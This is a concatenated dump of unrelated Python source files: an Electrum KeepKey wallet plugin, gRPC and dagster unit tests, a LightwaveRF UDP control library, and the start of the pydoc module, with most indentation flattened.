self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                # prioritise hiding outputs on the 'change' branch from the user,
                # because no more than one change address is allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.timestamp = d['time']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
_channel_test.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit.framework.common import test_constants
def _channel_and_completion_queue():
channel = cygrpc.Channel(b'localhost:54321', cygrpc.ChannelArgs(()))
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(connectivity,
cygrpc.Timespec(time.time() + 0.2),
completion_queue, None)
completion_queue.poll(deadline=cygrpc.Timespec(float('+inf')))
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(test_constants.THREAD_CONCURRENCY))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (
channel,
completion_queue,
))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
test_stdout.py
|
from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
ExecutionTargetHandle,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.utils import get_multiprocessing_context
HELLO_SOLID = 'HELLO SOLID'
HELLO_RESOURCE = 'HELLO RESOURCE'
SEPARATOR = os.linesep if (os.name == 'nt' and sys.version_info < (3,)) else '\n'
@resource
def resource_a(_):
print(HELLO_RESOURCE)
return 'A'
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition('num', int)], required_resource_keys={'a'})
def spew(_, num):
print(HELLO_SOLID)
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return '\n'.join([line for line in s.replace(os.linesep, '\n').split('\n') if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
spew_pipeline = define_pipeline()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = ExecutionTargetHandle.for_pipeline_python_file(
__file__, 'define_pipeline'
).build_pipeline_definition()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
environment_dict={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = 'spew.compute'
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace('\x1b[34m', '').replace('\x1b[0m', '')
assert 'dagster - DEBUG - spew_pipeline - ' in cleaned_logs
bad_logs = manager.read_logs_file('not_a_run_id', step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed('not_a_run_id', step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
instance = DagsterInstance.local_temp()
spew_pipeline = define_pipeline()
step_key = 'spew.compute'
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return ''.join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
environment_dict={'solids': {solid_name: {'inputs': {'num': 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, 'inner 1')
print(step_key, 'inner 2')
print(step_key, 'inner 3')
time.sleep(0.1)
def expected_inner_output(step_key):
return '\n'.join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return '\n'.join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.get_or_create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.get_or_create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
context = get_multiprocessing_context()
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
process = context.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
lightwave.py
|
"""Python library to provide reliable communication link with LightWaveRF lights and switches."""
import json
import logging
import socket
import time
from itertools import cycle
from queue import Queue
from threading import Thread
_LOGGER = logging.getLogger(__name__)
class LWLink():
"""LWLink provides a communication link with the LightwaveRF hub."""
SOCKET_TIMEOUT = 2.0
RX_PORT = 9761
TX_PORT = 9760
link_ip = None
proxy_ip = None
proxy_port = None
transaction_id = cycle(range(1, 1000))
the_queue = Queue()
thread = None
def __init__(self, link_ip=None):
"""Initialise the component."""
if link_ip is not None:
LWLink.link_ip = link_ip
def _send_message(self, msg):
"""Add message to queue and start processing the queue."""
LWLink.the_queue.put_nowait(msg)
        if LWLink.thread is None or not LWLink.thread.is_alive():
LWLink.thread = Thread(target=self._send_queue)
LWLink.thread.start()
def register(self):
"""Create the message to register client."""
msg = '!F*p'
self._send_message(msg)
def deregister_all(self):
"""Create the message to deregister all clients."""
msg = '!F*xP'
self._send_message(msg)
def turn_on_light(self, device_id, name):
"""Create the message to turn light on."""
msg = "!%sFdP32|Turn On|%s" % (device_id, name)
self._send_message(msg)
def turn_on_switch(self, device_id, name):
"""Create the message to turn switch on."""
msg = "!%sF1|Turn On|%s" % (device_id, name)
self._send_message(msg)
def turn_on_with_brightness(self, device_id, name, brightness):
"""Scale brightness from 0..255 to 1..32."""
brightness_value = round((brightness * 31) / 255) + 1
# F1 = Light on and F0 = light off. FdP[0..32] is brightness. 32 is
# full. We want that when turning the light on.
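        # Worked examples of the scaling above: brightness 0 -> FdP1 (lowest level),
        # 128 -> FdP17 (roughly half), and 255 -> FdP32 (full brightness).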
msg = "!%sFdP%d|Lights %d|%s" % (
device_id, brightness_value, brightness_value, name)
self._send_message(msg)
def turn_off(self, device_id, name):
"""Create the message to turn light or switch off."""
msg = "!%sF0|Turn Off|%s" % (device_id, name)
self._send_message(msg)
def set_temperature(self, device_id, temp, name):
"""Create the message to set the trv target temp."""
msg = '!%sF*tP%s|Set Target|%s' % (device_id, round(temp, 1), name)
self._send_message(msg)
def set_trv_proxy(self, proxy_ip, proxy_port):
"""Set Lightwave TRV proxy ip/port."""
self.proxy_ip = proxy_ip
self.proxy_port = proxy_port
def read_trv_status(self, serial):
"""Read Lightwave TRV status from the proxy."""
targ = temp = battery = trv_output = None
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.settimeout(2.0)
msg = serial.encode("UTF-8")
sock.sendto(msg, (self.proxy_ip, self.proxy_port))
response, dummy = sock.recvfrom(1024)
msg = response.decode()
j = json.loads(msg)
if "cTemp" in j.keys():
temp = j["cTemp"]
if "cTarg" in j.keys():
targ = j["cTarg"]
if "batt" in j.keys():
# convert the voltage to a rough percentage
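                        # For example, a reading of 3.0 V gives int((3.0 - 2.22) * 110) = 85 (%),
                        # while 2.22 V or less reads as 0 or negative.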
battery = int((j["batt"] - 2.22) * 110)
if "output" in j.keys():
trv_output = j["output"]
if "error" in j.keys():
_LOGGER.warning("TRV proxy error: %s", j["error"])
except socket.timeout:
_LOGGER.warning("TRV proxy not responing")
except socket.error as ex:
_LOGGER.warning("TRV proxy error %s", ex)
except json.JSONDecodeError:
_LOGGER.warning("TRV proxy JSON error")
return (temp, targ, battery, trv_output)
def _send_queue(self):
"""If the queue is not empty, process the queue."""
while not LWLink.the_queue.empty():
self._send_reliable_message(LWLink.the_queue.get_nowait())
def _send_reliable_message(self, msg):
"""Send msg to LightwaveRF hub."""
result = False
max_retries = 15
trans_id = next(LWLink.transaction_id)
msg = "%d,%s" % (trans_id, msg)
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \
as write_sock, \
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \
as read_sock:
write_sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
read_sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
read_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_BROADCAST, 1)
read_sock.settimeout(self.SOCKET_TIMEOUT)
read_sock.bind(('0.0.0.0', self.RX_PORT))
while max_retries:
max_retries -= 1
write_sock.sendto(msg.encode(
'UTF-8'), (LWLink.link_ip, self.TX_PORT))
result = False
while True:
response, dummy = read_sock.recvfrom(1024)
response = response.decode('UTF-8')
if "Not yet registered." in response:
_LOGGER.error("Not yet registered")
self.register()
result = True
break
if response.startswith("%d,OK" % trans_id):
result = True
break
if response.startswith("%d,ERR" % trans_id):
_LOGGER.error(response)
break
_LOGGER.info(response)
if result:
break
time.sleep(0.25)
except socket.timeout:
_LOGGER.error("LW broker timeout!")
return result
except Exception as ex:
_LOGGER.error(ex)
raise
if result:
_LOGGER.info("LW broker OK!")
else:
_LOGGER.error("LW broker fail!")
return result
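# A minimal, illustrative usage sketch (never called from this module). The hub address and
# the device id "R1D1" are hypothetical placeholders; real ids come from the LightwaveRF setup.
def _example_usage():
    link = LWLink("192.168.1.50")    # IP address of the LightwaveRF Link hub
    link.register()                  # the hub must accept this client once before commands work
    link.turn_on_with_brightness("R1D1", "Lounge lamp", 128)   # roughly half brightness
    link.turn_off("R1D1", "Lounge lamp")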
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo', '$py.class'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
